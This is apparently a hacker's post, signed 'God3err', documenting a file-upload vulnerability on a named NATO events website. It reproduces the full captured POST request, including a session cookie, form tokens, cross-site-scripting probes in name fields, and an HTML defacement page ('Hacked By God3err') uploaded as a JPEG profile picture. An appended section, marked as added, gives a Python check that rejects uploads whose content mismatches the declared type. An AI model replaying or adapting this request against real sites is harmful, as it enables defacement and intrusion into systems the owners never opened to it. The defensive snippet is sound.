NATO Upload Vulnerability
----------------------------------------------------------------
Site: https://events.jftc.nato.int
----------------------------------------------------------------
Video: https://www.youtube.com/watch?v=sxfdmc-FE5M
----------------------------------------------------------------
Vulnerable POST Request:
----------------------------------------------------------------
17:28:39.016
[4438ms]
[total 4438ms]
Status: 200[OK]
POST https://events.jftc.nato.int/user/26426/userdata?element_parents=userdata/user_picture&ajax_form=1&_wrapper_format=drupal_ajax&_wrapper_format=drupal_ajax
Load Flags[LOAD_BACKGROUND LOAD_BYPASS_LOCAL_CACHE ]
Content Size[-1]
Mime Type[application/json]
Request Headers:
Host[events.jftc.nato.int]
User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.7.2]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate, br]
X-Requested-With[XMLHttpRequest]
Referer[https://events.jftc.nato.int/user/26426/userdata]
Content-Length[7132]
Content-Type[multipart/form-data; boundary=---------------------------23222661824199]
Cookie[SSESS15be87fcc393b12e70eb4c4f98ed97bc=yV8zL34h9yB25fKnjwRcU6TDMwW6JnpCKenpm1T6ghA]
Connection[keep-alive]
Post Data:
POST_DATA[-----------------------------23222661824199
Content-Disposition: form-data; name="name"
-----------------------------23222661824199
Content-Disposition: form-data; name="first_name"
">ALERT(0);
-----------------------------23222661824199
Content-Disposition: form-data; name="surname"
">ALERT(0);
-----------------------------23222661824199
Content-Disposition: form-data; name="gender"
F
-----------------------------23222661824199
Content-Disposition: form-data; name="nato_rank_title"
OR3
-----------------------------23222661824199
Content-Disposition: form-data; name="national_title"
TUR
-----------------------------23222661824199
Content-Disposition: form-data; name="service"
ARMY
-----------------------------23222661824199
Content-Disposition: form-data; name="nationality"
Turkey (TUR)
-----------------------------23222661824199
Content-Disposition: form-data; name="id_number"
1213123123123
-----------------------------23222661824199
Content-Disposition: form-data; name="nato_security_clearance"
NATO Secret
-----------------------------23222661824199
Content-Disposition: form-data; name="organization[select]"
1 GNC
-----------------------------23222661824199
Content-Disposition: form-data; name="organization[other]"
-----------------------------23222661824199
Content-Disposition: form-data; name="contact_phone"
05********
-----------------------------23222661824199
Content-Disposition: form-data; name="ns_wan_address"
safasfasf
-----------------------------23222661824199
Content-Disposition: form-data; name="files[user_picture]"; filename="index.jpg"
Content-Type: image/jpeg
<html><h1>Hacked By God3err<h1></html>
-----------------------------23222661824199
Content-Disposition: form-data; name="user_picture[fids]"
-----------------------------23222661824199
Content-Disposition: form-data; name="security_clearance_fid[fids]"
6741
-----------------------------23222661824199
Content-Disposition: form-data; name="height"
168
-----------------------------23222661824199
Content-Disposition: form-data; name="eye_color"
Blue
-----------------------------23222661824199
Content-Disposition: form-data; name="marital_status"
married
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_date"
1974-05-06
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_town"
burdur
-----------------------------23222661824199
Content-Disposition: form-data; name="birth_country"
Afghanistan (AFG)
-----------------------------23222661824199
Content-Disposition: form-data; name="form_build_id"
form-vx5EXbx7djtg3TbaVszCcjOGLwqKe4DIHifWokHwsbY
-----------------------------23222661824199
Content-Disposition: form-data; name="form_token"
AsFqzDYst8b5UPULTTcOzKKSHtro8GetqNghSR9N-y8
-----------------------------23222661824199
Content-Disposition: form-data; name="form_id"
simple_form
-----------------------------23222661824199
Content-Disposition: form-data; name="_triggering_element_name"
user_picture_upload_button
-----------------------------23222661824199
Content-Disposition: form-data; name="_triggering_element_value"
Upload
-----------------------------23222661824199
Content-Disposition: form-data; name="_drupal_ajax"
1
-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[theme]"
bstheme
-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[theme_token]"
-----------------------------23222661824199
Content-Disposition: form-data; name="ajax_page_state[libraries]"
autologout/drupal.autologout,bootstrap/popover,bootstrap/tooltip,bstheme/bootstrap-scripts,bstheme/global-styling,core/drupal.active-link,core/drupal.date,core/drupal.states,core/html5shiv,core/jquery.form,core/jquery.form,d_filtertable/filtertable,d_signup/signup_registrant_info_sticky,d_signup/signup_select_row,file/drupal.file,file/drupal.file,hide_submit/hide_submit,system/base
-----------------------------23222661824199--
]
Response Headers:
Server[nginx]
Date[Tue, 08 May 2018 14:28:43 GMT]
Content-Type[application/json]
Cache-Control[must-revalidate, no-cache, private]
x-ua-compatible[IE=edge]
Content-Language[en]
X-Content-Type-Options[nosniff]
X-Frame-Options[SAMEORIGIN]
Expires[Sun, 19 Nov 1978 05:00:00 GMT]
Vary[Accept-Encoding]
x-generator[Drupal 8 (https://www.drupal.org)]
x-drupal-ajax-token[1]
Content-Encoding[gzip]
x-request-id[v-1bf98b42-52cc-11e8-903d-22000a271e78]
x-ah-environment[prod]
x-varnish[713984183]
Age[0]
via[1.1 varnish-v4]
X-Cache[MISS]
Accept-Ranges[bytes]
X-Firefox-Spdy[h2]
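------------------------------------------------------------------------
Server-side check for the mismatch visible in the files[user_picture] part above, where the part is declared image/jpeg but its body is HTML. This is an added example, not code from the original post or from Drupal; the function name check_uploads, the allow-list and the sample body are constructed for illustration.

```python
import email

# Leading bytes of the image formats a profile-picture field should accept
# (assumed allow-list for this example).
MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}

def check_uploads(content_type_header, body):
    """Return (field, filename, verdict) for every file part of a multipart body."""
    # Reuse the stdlib MIME parser by prepending the request's Content-Type header.
    msg = email.message_from_bytes(
        b"Content-Type: " + content_type_header.encode() + b"\r\n\r\n" + body)
    if not msg.is_multipart():
        return []
    results = []
    for part in msg.get_payload():
        filename = part.get_filename()
        if filename is None:              # ordinary form field, not a file
            continue
        field = part.get_param("name", header="content-disposition")
        declared = part.get_content_type()   # client-controlled, never trusted alone
        data = part.get_payload(decode=True) or b""
        signatures = MAGIC.get(declared)
        if signatures is None:
            verdict = "reject: type not allowed"
        elif not data.startswith(signatures):
            verdict = "reject: content does not match declared type"
        else:
            verdict = "accept"
        results.append((field, filename, verdict))
    return results

# Constructed sample: one part shaped like the capture above, one real JPEG header.
HEADER = "multipart/form-data; boundary=example-boundary"
SAMPLE = (
    b'--example-boundary\r\n'
    b'Content-Disposition: form-data; name="gender"\r\n\r\nF\r\n'
    b'--example-boundary\r\n'
    b'Content-Disposition: form-data; name="files[user_picture]"; filename="index.jpg"\r\n'
    b'Content-Type: image/jpeg\r\n\r\n<html><h1>not an image</h1></html>\r\n'
    b'--example-boundary\r\n'
    b'Content-Disposition: form-data; name="files[user_picture]"; filename="photo.jpg"\r\n'
    b'Content-Type: image/jpeg\r\n\r\n\xff\xd8\xff\xe0\x00\x10JFIF\x00\r\n'
    b'--example-boundary--\r\n'
)

if __name__ == "__main__":
    for row in check_uploads(HEADER, SAMPLE):
        print(row)
```

A signature check is only a first filter; decoding and re-encoding the image on the server is stricter, since a file can start with valid image bytes and still carry other content.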
------------------------------------------------------------------------
//God3err - Thanks For Reading
------------------------------------------------------------------------
Twitter : @KizilKullanici
------------------------------------------------------------------------
☭ God3err ☭
------------------------------------------------------------------------